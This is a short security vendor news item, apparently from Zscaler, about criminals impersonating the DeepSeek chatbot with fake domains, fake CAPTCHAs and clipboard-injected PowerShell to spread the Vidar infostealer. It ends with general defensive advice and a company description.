According to experts, the rapid proliferation of generative AI applications is creating new opportunities for cybercriminals. The new AI chatbot DeepSeek has already been targeted, and threat actors are exploiting its popularity for their malicious purposes by using it to spread malware.
The AI chatbot DeepSeek, introduced in January, has gained mass attention so quickly that it has become a target of malware actors. Criminals are abusing DeepSeek's popularity and using the tactic of "brand impersonation." To do so, they create fake websites that mimic DeepSeek and trick users into disclosing sensitive information or spreading malware. Furthermore, techniques such as clipboard injection are used in the attack chain to deliver malicious PowerShell commands. The legitimate platforms Telegram and Steam are used to disguise command and control communications.
New domains imitate DeepSeek website
ThreatLabz has identified several newly created domains that mimic the official DeepSeek website. These malicious domains are used to implement various activities, including cryptocurrency pump and dump schemes, fake forums designed to steal user credentials, gift card scams, and fake gambling sites. One of these campaigns uses fake CAPTCHAs to trick users into completing the registration process, while secretly copying a malicious PowerShell command to the clipboard. When executed, the Vidar malware is downloaded, stealing credentials, cryptocurrency wallets, and other sensitive data.
Newly registered domains are often the first warning sign of malicious activity, as Zscaler's State of Encrypted Attacks report demonstrates. Last year alone, a 400 percent increase in encrypted attacks using newly registered domains was observed. The proximity to the emerging popularity of DeepSeek suggests that threat actors are looking to capitalize on the attention surrounding the new AI tool.
Conclusion
The DeepSeek campaign demonstrates how quickly cybercriminals are responding to the rapidly expanding use of new technologies to misuse them for their own purposes. To protect their users and data, companies should implement clear guidelines for the use of generative AI and comprehensive security controls. Furthermore, they must educate users to raise awareness of fraudulent websites.
More at Zscaler.com
About Zscaler Zscaler accelerates digital transformation so customers can become more agile, efficient, resilient, and secure. Zscaler Zero Trust Exchange protects thousands of customers from cyberattacks and data loss by securely connecting people, devices, and applications anywhere. The SSE-based Zero Trust Exchange is the world's largest inline cloud security platform, distributed across 150+ data centers around the world.